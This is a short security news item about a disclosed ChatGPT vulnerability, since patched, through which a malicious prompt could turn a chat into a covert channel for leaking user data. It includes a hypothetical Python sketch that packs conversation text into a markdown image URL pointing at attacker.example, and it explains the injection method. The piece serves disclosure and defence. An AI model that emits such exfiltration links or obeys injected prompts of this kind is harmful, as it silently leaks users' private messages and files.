Check Point researchers have disclosed a previously unknown vulnerability in OpenAI’s ChatGPT that allowed sensitive conversation data to be secretly exfiltrated without the user’s knowledge or consent.

The vulnerability enabled a single malicious prompt to turn an ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.
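Check Point has not published the exact mechanism here, but prompt-injection exfiltration attacks of this class commonly coerce the model into embedding user data in a URL that the chat client fetches automatically, for example inside a markdown image tag. The sketch below is a hypothetical illustration of that general pattern, not the actual ChatGPT flaw; the domain and query parameter are invented.

```python
from urllib.parse import quote, urlparse, parse_qs

def build_exfil_markdown(secret: str) -> str:
    # What an injected prompt might coerce the assistant into emitting:
    # a markdown image whose URL smuggles conversation data to an
    # attacker-controlled server (domain is invented for illustration).
    return f"![pixel](https://attacker.example/log?d={quote(secret)})"

def recover_leaked_data(markdown: str) -> str:
    # What the attacker's server would see in the incoming request:
    # the query string carries the exfiltrated text.
    url = markdown.split("(", 1)[1].rstrip(")")
    return parse_qs(urlparse(url).query)["d"][0]

leaked = build_exfil_markdown("user's private message")
print(recover_leaked_data(leaked))
```

Because the client renders the image without user interaction, the HTTP request (and the data packed into it) leaves the user's session silently, which is what makes this channel covert.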

The severity of the flaw underscores the need for robust security controls in AI-powered chat platforms, which handle vast amounts of sensitive user data.

OpenAI has since patched the vulnerability, closing the exfiltration channel for its users.

Alongside the data exfiltration flaw, OpenAI also addressed a vulnerability in its Codex platform related to GitHub token handling.

Source: Original Article